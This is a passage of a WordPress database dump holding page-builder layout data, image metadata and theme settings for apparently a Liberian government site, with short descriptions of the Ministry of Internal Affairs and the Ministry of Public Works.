page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(24044,3525,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(24046,1610,'_thumbnail_id','3524'),(24047,3526,'_elementor_edit_mode','builder'),(24048,3526,'_elementor_template_type','wp-post'),(24049,3526,'_elementor_version','2.7.5'),(24050,3526,'_wp_page_template','default'),(24051,3526,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"644e2d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners\\u2019 residences; schools; clinics markets; peace huts; latrines; wells; etc.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3cd232e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"58747a71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4bd205e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b1b1970\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mia\\\",\\\"tag_id\\\":\\\"59\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mia\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"177453a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"182afa84\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"375dd5cc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"78a5b2a8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mia\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(24052,3526,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(24054,3526,'_thumbnail_id','3524'),(24055,1594,'_last_editor_used_jetpack','classic-editor'),(24056,3527,'_wp_attached_file','2019/11/mpw.png'),(24057,3527,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2019/11/mpw.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"mpw-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"mpw-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"mpw-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24058,1594,'_thumbnail_id','3527'),(24059,3528,'_elementor_edit_mode','builder'),(24060,3528,'_elementor_template_type','wp-post'),(24061,3528,'_elementor_version','2.7.5'),(24062,3528,'_wp_page_template','default'),(24063,3528,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting\\/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.<\\/p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"321d2cc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a8d61b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5373839\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe27600\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mpw\\\",\\\"tag_id\\\":\\\"63\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mpw\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dae3b98\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mpw\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(24064,3528,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(24066,3528,'_thumbnail_id','3527'),(24067,3531,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1627597976;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3117;}i:1;a:1:{s:2:\"id\";i:3313;}i:2;a:1:{s:2:\"id\";i:3534;}}}}'),(24068,3531,'_edit_lock','1614767201:42'),(24069,3531,'_last_editor_used_jetpack','block-editor'),(24070,3532,'_wp_attached_file','2021/03/Meeting.png'),(24071,3532,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:19:\"2021/03/Meeting.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Meeting-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Meeting-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Meeting-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24074,3531,'_thumbnail_id','3532'),(24075,3531,'_edit_last','42'),(24078,3531,'ocean_gallery_link_images','off'),(24079,3531,'ocean_sidebar','0'),(24080,3531,'ocean_second_sidebar','0'),(24081,3531,'ocean_disable_margins','enable'),(24082,3531,'ocean_display_top_bar','default'),(24083,3531,'ocean_display_header','default'),(24084,3531,'ocean_center_header_left_menu','0'),(24085,3531,'ocean_custom_header_template','0'),(24086,3531,'ocean_header_custom_menu','0'),(24087,3531,'ocean_menu_typo_font_family','0'),(24088,3531,'ocean_disable_title','default'),(24089,3531,'ocean_disable_heading','default'),(24090,3531,'ocean_disable_breadcrumbs','default'),(24091,3531,'ocean_display_footer_widgets','default'),(24092,3531,'ocean_display_footer_bottom','default'),(24093,3531,'ocean_custom_footer_template','0'),(24094,3531,'ocean_link_format_target','self'),(24095,3531,'ocean_quote_format_link','post'),(24096,3531,'osh_disable_topbar_sticky','default'),(24097,3531,'osh_disable_header_sticky','default'),(24098,3531,'osh_sticky_header_style','default'),(24101,3534,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1627569653;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3297;}i:1;a:1:{s:2:\"id\";i:3738;}i:2;a:1:{s:2:\"id\";i:3038;}}}}'),(24102,3534,'_edit_lock','1620300993:42'),(24103,3534,'_last_editor_used_jetpack','block-editor'),(24106,3536,'_wp_attached_file','2021/03/ICAT.png'),(24107,3536,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2021/03/ICAT.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"ICAT-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ICAT-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"ICAT-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24108,3537,'_wp_attached_file','2021/03/ICAT-1.png'),(24109,3537,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:18:\"2021/03/ICAT-1.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"ICAT-1-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"ICAT-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"ICAT-1-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24112,3534,'_thumbnail_id','3537'),(24113,3534,'_edit_last','42'),(24114,3534,'ocean_gallery_link_images','off'),(24115,3534,'ocean_sidebar','0'),(24116,3534,'ocean_second_sidebar','0'),(24117,3534,'ocean_disable_margins','enable'),(24118,3534,'ocean_display_top_bar','default'),(24119,3534,'ocean_display_header','default'),(24120,3534,'ocean_center_header_left_menu','0'),(24121,3534,'ocean_custom_